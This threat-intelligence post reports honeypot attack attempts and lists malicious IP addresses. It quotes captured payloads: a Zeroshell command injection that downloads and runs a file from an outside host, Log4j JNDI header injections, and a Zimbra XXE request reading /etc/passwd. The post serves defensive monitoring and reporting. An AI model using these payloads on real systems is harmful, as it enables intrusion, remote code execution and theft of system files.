These past two weeks, international TEHTRIS honeypots got relentlessly hit again by suspected malicious activities. The honeypots located in Southeast America, in South and Northeast Asia Pacific and in Western Europe were the most targeted. Here is an extract of some of the attack attempts that were detected.
Attempts to exploit CVE-2019-12725 on German and Portuguese honeypots
Two malicious IP addresses have been detected by TEHTRIS NTA performing a Zeroshell remote code execution (RCE) inbound attempt. Indeed, some of our European honeypots could have been compromised through the CVE-2019-12725 (CVSSv3 : 9,8).
The US IP 4.71.37[.]46, hosted by AS 3356 LEVEL3, performed several dozen hits on Germany and Portugal. This IP address is known from public databases identifying malicious IP addresses.
The Chinese IP 36.110.214[.]195, hosted by AS 23724 IDC, China Telecommunications Corporation, is unknown from public databases of malicious IP. This IP performed only one hit on a German honeypot.
This specific URL is the downloading action for Zero botnet.
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0URL DECODE : “;cd /tmp;curl -O http://5.206.227[.]228/zero;sh zero;”
The address IP in pink included in the packet above, likely a C2, is a known Portuguese address for exploiting Zeroshell. It is hosted by AS 47674 Net Solutions – Consultoria Em Tecnologias De Informacao, Sociedade Unipessoal LDA.
Log4j exploit attempts on a Swedish honeypot
One of our Swedish honeypots has been the target of loads of “jndi” requests that are known for being used in attempts to exploit Log4j vulnerability on devices.
27 IP addresses performed the following headers – which was the most requested upon others:
['origin: $ {jndi:ldap://:8182/a}', 'x-api-version: $ {jndi:ldap://:8182/a}', 'x-att-deviceid: $ {jndi:ldap://:8182/a}', 'proxy-connection: $ {jndi:ldap://:8182/a}', 'prefer: $ {jndi:ldap://:8182/a}', 'accept: */*', 'upgrade-insecure-requests: $ {jndi:ldap://:8182/a}', 'warning: $ {jndi:ldap://:8182/a}', 'a-im: $ {jndi:ldap://:8182/a}', 'x-request-id: $ {jndi:ldap://:8182/a}', 'from: $ {jndi:ldap://:8182/a}', 'forwarded: $ {jndi:ldap://:8182/a}', 'access-control-request-method: $ {jndi:ldap://:8182/a}', 'dnt: $ {jndi:ldap://:8182/a}', 'cache-control: $ {jndi:ldap://:8182/a}', 'x-uidh: $ {jndi:ldap://:8182/a}', 'authorization: $ {jndi:ldap://:8182/a}', 'accept-encoding: gzip', 'x-wap-profile: $ {jndi:ldap://:8182/a}', 'access-control-request-headers: $ {jndi:ldap://:8182/a}', 'x-forwarded-proto: $ {jndi:ldap://:8182/a}', 'pragma: $ {jndi:ldap://:8182/a}', 'date: $ {jndi:ldap://:8182/a}', 'x-forwarded-host: $ {jndi:ldap://:8182/a}', 'x-correlation-id: $ {jndi:ldap://:8182/a}', 'x-requested-with: $ {jndi:ldap://:8182/a}', 'front-end-https: $ {jndi:ldap://:8182/a}', 'http2-settings: $ {jndi:ldap://:8182/a}', 'x-csrf-token: $ {jndi:ldap://:8182/a}']Other headers performed look exactly the same except for the port number 8182 that changes in a range from 8180 to 8189.
Here are the top 10 IoCs – all known from public databases identifying malicious IPs:
| IP | AS | Country |
| 93.91.117[.]60 | AS 47562 Fast Link Ltd | RU |
| 120.236.74[.]234 | AS 9808 China Mobile Communications Group Co., Ltd. | CN |
| 85.51.217[.]156 | AS 12479 Orange Espagne SA | ES |
| 118.41.204[.]72 222.103.98[.]58 | AS 4766 Korea Telecom | KR |
| 72.132.58[.]237 | AS 20001 TWC-20001-PACWEST | US |
| 178.140.136[.]178 | AS 42610 Rostelecom | RU |
| 223.171.91[.]144 | AS 17853 LGTELECOM | KR |
| 46.170.151[.]34 | AS 5617 Orange Polska Spolka Akcyjna | PL |
| 147.182.233[.]56 | AS 14061 DIGITALOCEAN-ASN | US |
Attempts to exploit CVE-2019-9621 on European honeypots by a Russian IP
Thanks to TEHTRIS NTA that automatically detects any anomaly in the traffic, we monitored an increase in attempts to exploit CVE-2019-9621 (CVSSv3 : 7,5) impacting Zimbra version inferior to 8.8.11 these past two weeks. Indeed, Zimbra Collaboration Suite before 8.6 patch 13, 8.7.x before 8.7.11 patch 10, and 8.8.x before 8.8.10 patch 7 or 8.8.x before 8.8.11 patch 3 allows Server-side request forgery (SSRF) and XML External Entity injection via the ProxyServlet component.
The Russian IP address 152.89.196[.]211 (AS 57523 Chang Way Technologies Co. Limited) performed hundreds of actions against all our TEHTRIS European honeypots during this second half of February. This IP identified as malicious in public databases started to attack our honeypots on the 10th of January.
Here is one example of the requests seen in NTA packet:
POST /Autodiscover/Autodiscover.xml HTTP/1.1 Host: xx.x.xxx.xx:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Length: 314 Content-Type: application/xml Accept-Encoding: gzip Connection: close <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"> <Request> <EMailAddress>aaaaa</EMailAddress> <AcceptableResponseSchema>&xxe;</AcceptableResponseSchema> </Request> </Autodiscover>The line in pink is an attempt to obtain the file/etc/passwd that notably contains the list of the users of the machine.